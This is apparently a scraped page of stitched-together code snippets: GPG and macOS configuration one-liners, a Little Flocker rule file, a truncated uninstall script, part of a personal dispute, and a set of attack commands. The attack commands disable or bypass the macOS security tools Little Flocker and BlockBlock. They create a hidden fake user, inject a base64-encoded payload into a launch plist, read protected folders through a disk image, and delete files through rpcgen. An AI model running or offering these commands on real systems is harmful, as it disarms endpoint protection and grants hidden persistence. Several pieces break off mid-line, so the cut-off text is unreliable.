# Install GPG Tools 2 and generate your PGP keys
# Add the public key in your Github account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this:
# Ty
git config --global user.signingkey [LONG KEY ID] && git config --global commit.gpgsign true && git config --global gpg.program gpg2; echo 'no-tty' >> ~/.gnupg/gpg.conf
# Useful to prevent Macbooks to go to sleep when closing the lid instead of running tools that requires a Kernel Extension (e.g. InsomniaX) and more
sudo pmset -a sleep 0; sudo pmset -a hibernatemode 0; sudo pmset -a disablesleep 1;
View Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome" r
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
View response.txt
Here is the last discussion I had with him (he dared mentioned me on a 10 days old topic and then when I give arguments to the very same topic or replies to his attacks I "harass" him):
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me ( so I'm going to clarify this here, point by point:
Diff between both pastebin:
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE